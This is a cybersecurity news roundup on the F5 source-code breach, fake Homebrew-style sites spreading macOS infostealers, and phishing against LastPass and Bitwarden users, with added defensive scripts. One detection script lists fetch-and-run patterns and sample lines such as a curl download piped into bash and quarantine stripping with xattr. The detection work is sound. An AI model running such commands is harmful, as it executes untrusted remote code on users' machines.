This week’s top cybersecurity and dark web news stories cover the F5 breach, Google ads for fake sites delivering infostealer malware, and fake password manager alerts leading to PC hijacks.
F5 suffers breach by nation-state actor
U.S. cybersecurity firm F5 has disclosed a breach of its systems, resulting in the theft of BIG-IP source code and details on undisclosed vulnerabilities. The company attributes the attack to a “highly sophisticated nation-state threat actor” who maintained persistent access to its network.
F5 learned of the breach on August 9, 2025, but delayed public disclosure at the request of the U.S. Department of Justice. While F5 states it has successfully contained the threat, the duration of the attackers’ access to the BIG-IP product development environment remains unstated. The company emphasized that it has found no evidence of the stolen vulnerabilities being exploited, and that critical systems such as CRM, financial, and iHealth were not accessed.
However, some exfiltrated files from F5’s knowledge management platform did contain configuration or implementation information for a small percentage of customers, who will be directly notified.
In response, F5 has engaged Google Mandiant and CrowdStrike, rotated credentials, strengthened access controls, and enhanced its security architecture. Users are urged to apply the latest updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive (ED 26-01) requiring Federal Civilian Executive Branch agencies to inventory F5 BIG-IP products, ensure networked management interfaces are not publicly accessible, and apply F5’s new updates by October 22, 2025. CISA warns that the stolen data provides the threat actor with a “technical advantage to exploit F5 devices and software,” posing an “imminent threat to federal networks.” Agencies must submit a complete inventory and actions taken to CISA by October 29, 2025.
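The directive’s two operational steps, inventory the devices and keep their management interfaces off public networks, are easy to turn into a repeatable check. The script below is an added example, not code from the article, F5, or CISA: it reads a constructed inventory in an assumed hostname,product,mgmt_ip form and flags every device whose management address falls outside an assumed list of approved internal management networks, or whose address cannot be parsed at all. The approved networks, hostnames, and addresses are made up for this example; an address outside the approved ranges is drawn from an RFC 5737 documentation block so that no real host is named.

```python
"""Added example: audit an F5 device inventory for management interfaces
outside the approved management networks. The inventory format, the network
list and every hostname/address are assumptions constructed for this example."""
import csv
import io
import ipaddress

# Assumption: the organisation's approved management networks. A real run
# would load these from the address plan rather than hard-coding them.
APPROVED_MGMT_NETWORKS = [
    ipaddress.ip_network("10.20.0.0/16"),
    ipaddress.ip_network("172.16.50.0/24"),
]

# Constructed sample inventory. 203.0.113.17 is from the RFC 5737
# documentation range and stands in for "an address outside the approved
# networks"; the last row shows how a malformed entry is reported.
SAMPLE_INVENTORY = """hostname,product,mgmt_ip
ltm-edge-01,BIG-IP,10.20.4.11
ltm-edge-02,BIG-IP,203.0.113.17
bigiq-mgmt-01,BIG-IQ,172.16.50.8
f5os-chassis-01,F5OS,10.20.9.2
ltm-lab-01,BIG-IP,not-an-address
"""


def parse_inventory(text):
    """Parse CSV text into a list of row dicts (hostname, product, mgmt_ip)."""
    return list(csv.DictReader(io.StringIO(text)))


def is_approved(address):
    """True if the address sits inside an approved management network,
    False if it does not, None if the address cannot be parsed."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return None
    return any(ip in net for net in APPROVED_MGMT_NETWORKS)


def audit_inventory(text):
    """Return (exposed, unparseable): hostnames whose management address is
    outside the approved networks, and hostnames whose address is invalid."""
    exposed, unparseable = [], []
    for row in parse_inventory(text):
        verdict = is_approved(row["mgmt_ip"].strip())
        if verdict is None:
            unparseable.append(row["hostname"])
        elif not verdict:
            exposed.append(row["hostname"])
    return exposed, unparseable


if __name__ == "__main__":
    exposed, unparseable = audit_inventory(SAMPLE_INVENTORY)
    for host in exposed:
        print(f"REVIEW  {host}: management address outside approved networks")
    for host in unparseable:
        print(f"INVALID {host}: management address could not be parsed")
```

The membership test only proves that the recorded address is on an internal network; it does not prove that nothing forwards traffic to it from the outside. Confirming the interface is actually unreachable from the internet still means reviewing the firewall and NAT rules in front of it.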
Bloomberg reported that the attackers were in F5’s network for at least 12 months, utilizing malware dubbed BRICKSTORM, attributed to the China-nexus cyber espionage group UNC5221. Mandiant and Google Threat Intelligence Group (GTIG) previously revealed that this group has targeted legal services, SaaS providers, BPOs, and technology sectors in the U.S. with the BRICKSTORM backdoor.
Google ads for fake sites deliver infostealer malware
A sophisticated new malicious campaign is actively targeting macOS developers, leveraging fake versions of popular platforms like Homebrew, LogMeIn, and TradingView to distribute infostealing malware, including AMOS (Atomic macOS Stealer) and Odyssey.
The attackers employ “ClickFix” techniques, tricking unsuspecting developers into executing specific commands in their Terminal. These commands, often disguised as legitimate installation steps, fetch and decode an ‘install.sh’ file that downloads a malicious payload. This payload then bypasses Gatekeeper prompts and removes quarantine flags, allowing the malware to execute.
Once active, the malware, either AMOS or Odyssey, first checks whether it is running in a virtual machine or analysis system. It then escalates privileges using sudo to run commands as root, collecting detailed hardware and memory information. The malware manipulates system services, such as killing OneDrive updater daemons, and interacts with macOS XPC services to blend its malicious activities with legitimate processes.
Ultimately, the information-stealing components are activated, harvesting sensitive data such as browser data and cryptocurrency credentials and exfiltrating it to a command-and-control (C2) server.
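The chain described above leaves a recognisable trace in shell history and endpoint command-line telemetry: a remote fetch or a base64 decode piped straight into a shell, followed by quarantine-attribute removal, often under sudo. The scanner below is an added example, not code from the article or from any vendor, that runs a small set of indicator rules over constructed sample command lines and flags only the combinations that match the ClickFix pattern, so that an ordinary package install or a harmless `xattr -l` is not reported. The indicator names, the scoring rule, and the sample lines are all assumptions made for this example.

```python
"""Added example: flag ClickFix-style command lines in shell history or EDR
telemetry. Indicator names, the decision rule and the sample lines are
constructed for this example, not taken from the article."""
import re

# Each indicator is a regex over one command line. Names are assumptions.
INDICATORS = {
    # "| sh", "| bash", "| zsh", optionally "| sudo bash"
    "pipe_to_shell": re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
    # macOS base64 accepts -D/--decode; GNU-style -d is also seen
    "base64_decode": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    # removing the quarantine attribute, or clearing all attributes (-c)
    "quarantine_strip": re.compile(r"\bxattr\b.*-(?:d\s+com\.apple\.quarantine|c\b)"),
    "privilege_escalation": re.compile(r"\bsudo\b"),
}

# Constructed sample history; the base64 payload is deliberately elided.
SAMPLE_HISTORY = [
    "brew install wget",
    "curl -fsSL https://example.invalid/install.sh | bash",
    'echo "<base64 elided>" | base64 -d | bash',
    "sudo xattr -d com.apple.quarantine /tmp/update",
    "git pull --rebase",
    "xattr -l ~/Downloads/report.pdf",
]


def classify(line):
    """Return the list of indicator names that match this command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(line)]


def is_suspicious(line):
    """Decision rule (an assumption for this example): a pipe into a shell is
    suspicious only when fed by a remote fetch or a base64 decode; stripping
    the quarantine attribute is suspicious on its own."""
    hits = set(classify(line))
    piped_payload = "pipe_to_shell" in hits and (
        "remote_fetch" in hits or "base64_decode" in hits
    )
    return piped_payload or "quarantine_strip" in hits


def severity(line):
    """'high' when a suspicious line also runs under sudo, else 'medium'."""
    return "high" if "privilege_escalation" in classify(line) else "medium"


def scan(lines):
    """Return (index, line, indicators, severity) for every flagged line."""
    return [
        (i, line, classify(line), severity(line))
        for i, line in enumerate(lines)
        if is_suspicious(line)
    ]


if __name__ == "__main__":
    for index, line, hits, level in scan(SAMPLE_HISTORY):
        print(f"[{level}] line {index}: {line}\n        indicators: {', '.join(hits)}")
```

Running it against the constructed history flags lines 1 to 3 and leaves the package install and the read-only `xattr -l` alone. In production the same rules fit naturally into an EDR query over process command lines, where the parent process (a terminal launched from a browser session) adds further context.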
AMOS, first identified in April 2023, is a malware-as-a-service (MaaS) offering, available for a $1,000/month subscription, capable of stealing a wide array of data. Its creators recently added a backdoor for remote persistent access. Odyssey Stealer, a newer variant documented by CYFIRMA researchers this summer, is derived from Poseidon Stealer, which itself was forked from AMOS. Odyssey targets credentials and cookies from Chrome, Firefox, and Safari, over a hundred cryptocurrency wallet extensions, Keychain data, and personal files, sending them to attackers in ZIP format.
Users are strongly advised against pasting Terminal commands found online unless they fully understand their function and origin.
Phishing campaign targets LastPass and Bitwarden users
An ongoing phishing campaign is actively targeting users of popular password managers LastPass and Bitwarden with fake emails claiming recent hacks. These emails urge recipients to download a “more secure” desktop version of the password manager, which actually installs remote monitoring and management (RMM) tools, Syncro and ScreenConnect, giving threat actors remote access to compromised systems.
LastPass has confirmed that it has not been hacked and that these emails are a social engineering attempt. The phishing messages are well-crafted, often arriving from deceptive domains like ‘hello@lastpasspulse.blog’ or ‘hello@lastpasjournal.blog’. Bitwarden users are also being targeted with similar emails from domains such as ‘hello@bitwardenbroadcast.blog’.
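Every sender address quoted above shares one trait: the vendor’s name, or a one-letter variant of it, is embedded in a domain the vendor does not own. The script below is an added example, not code from the article, LastPass, or Bitwarden, that classifies a sender address as official, lookalike, or unknown by first checking it against an assumed allowlist of vendor domains and then measuring the edit distance between each brand name and every window of each domain label. It goes a little beyond the three addresses in the article by also catching the brand placed in a subdomain. The allowlist, the brand list, and the distance threshold are assumptions for this example; the sample addresses are the ones quoted in the article plus constructed benign ones.

```python
"""Added example: classify e-mail sender domains as official, lookalike or
unknown for a set of password-manager brands. The allowlist, threshold and
constructed benign addresses are assumptions made for this example."""
import re

# Assumption: the vendor domains a defender would keep on an allowlist.
OFFICIAL_DOMAINS = {
    "lastpass": {"lastpass.com"},
    "bitwarden": {"bitwarden.com"},
    "1password": {"1password.com"},
}
MAX_EDIT_DISTANCE = 1  # assumption: one typo away still counts as the brand

# Sample senders: the first three are quoted in the article, the rest are
# constructed benign addresses for contrast.
SAMPLE_SENDERS = [
    "hello@lastpasspulse.blog",
    "hello@lastpasjournal.blog",
    "hello@bitwardenbroadcast.blog",
    "LastPass Support <support@lastpass.com>",
    "alerts@mail.bitwarden.com",
    "newsletter@example.org",
]


def sender_domain(address):
    """Extract the lower-cased domain from 'addr' or 'Name <addr>' forms."""
    match = re.search(r"<([^>]+)>", address)
    addr = match.group(1) if match else address
    return addr.strip().rsplit("@", 1)[-1].lower()


def levenshtein(a, b):
    """Classic edit distance with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def brand_distance(label, brand):
    """Smallest edit distance between the brand and any window of the label
    whose length is within one character of the brand's length."""
    best = None
    for width in (len(brand) - 1, len(brand), len(brand) + 1):
        for start in range(0, len(label) - width + 1):
            d = levenshtein(label[start:start + width], brand)
            best = d if best is None or d < best else best
    return best


def classify_sender(address):
    """Return ('official' | 'lookalike' | 'unknown', brand-or-None)."""
    domain = sender_domain(address)
    for brand, domains in OFFICIAL_DOMAINS.items():
        if any(domain == d or domain.endswith("." + d) for d in domains):
            return "official", brand
    labels = domain.split(".")[:-1]  # every label except the TLD
    for brand in OFFICIAL_DOMAINS:
        for label in labels:
            d = brand_distance(label, brand)
            if d is not None and d <= MAX_EDIT_DISTANCE:
                return "lookalike", brand
    return "unknown", None


if __name__ == "__main__":
    for sender in SAMPLE_SENDERS:
        verdict, brand = classify_sender(sender)
        print(f"{verdict:9} {brand or '-':10} {sender}")
```

The windowed edit distance is what catches ‘lastpasjournal.blog’, where the brand is both misspelled and glued to another word, so a plain substring check would miss it. The allowlist check runs first so that legitimate subdomains of the vendor’s own domain are never reported as lookalikes; a mail gateway would typically quarantine or tag the lookalike verdicts and leave the rest alone.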
The installed malware hides its system tray icon and is configured to deploy ScreenConnect, allowing attackers to remotely connect, deploy further malware, steal data, and potentially access password vaults.
This campaign follows a recent attack on 1Password users, where phishing emails falsely warned of compromised accounts and directed users to fraudulent landing pages to steal master passwords.
Users of password management tools are strongly advised to ignore such alerts and always log in to the provider’s official website to check for security updates.